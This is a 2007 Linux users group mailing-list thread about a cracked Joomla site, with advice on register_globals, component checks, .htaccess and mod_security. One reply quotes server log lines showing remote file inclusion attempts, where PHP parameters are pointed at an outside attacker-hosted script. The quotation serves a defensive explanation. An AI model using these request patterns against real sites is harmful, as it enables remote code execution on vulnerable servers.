Thank you for sharing this information.  If one is on shared hosting there is not way to turn off registered globals via the php.ini ... Am I correct so far?

I seem to recall there is some code when added to one's code that it will over ride this.  I this correct, and if so can you explain it.  I looked on google and could not find it...

Thanks,
Keith

JD Austin <jd@twingeckos.com> wrote:
Using url tricks crackers exploit in many types of web applications.  The register_globals feature in php is used to trick the site into using a different configuration .php file in another location across the net and run it.  It's a trick as old as CGI.
Looking at my logs I see TONS of these types attempts:
208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?& / HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.
php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"

It was never an issue with Joomla itself but third party components and modules coded by people less security minded have been exploited.  com_extcalendar, com_galeria a few others were commonly used to overwrite the index.php and configuration.php files.  From there they'd use php to create and run shell scripts to do various malicious things.

Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Since Joomla 1.0.11 this issue has been addressed using .htaccess and re-coding to allow register globals to be turned off.   Since Joomla is used on a wide range of platforms (even windows) they still support the old register_globals method of variables but try to coerce users into setting it up right.

I also install mod_security to make that sort of attack stop in it's tracks.

JD

Technomage wrote:
this may sound like a stupid question on my part (sorry guys, I've been 
working lately, so I haven't kept up): what exactly was cracked on the site
and how was it done?

details would be greatly appreciated.

thanks.


On Monday 01 January 2007 04:29, Jim wrote:
Edward Norton wrote:
PLUG cracked AGAIN? Not surprising considering you guys wont consider
anything other than a badly coded PHP CMS.
Ed,

Apparently you know more about securing a site than the people who run
it. At least that's what your message implies. I have an idea. When
it's time for the next PLUG meeting, come out of the sewer, show up at
the meeting and offer to help secure the site.
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change you mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss



Keith Smith
A link from my website to yours
Submit Your Metro Phoenix Website

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com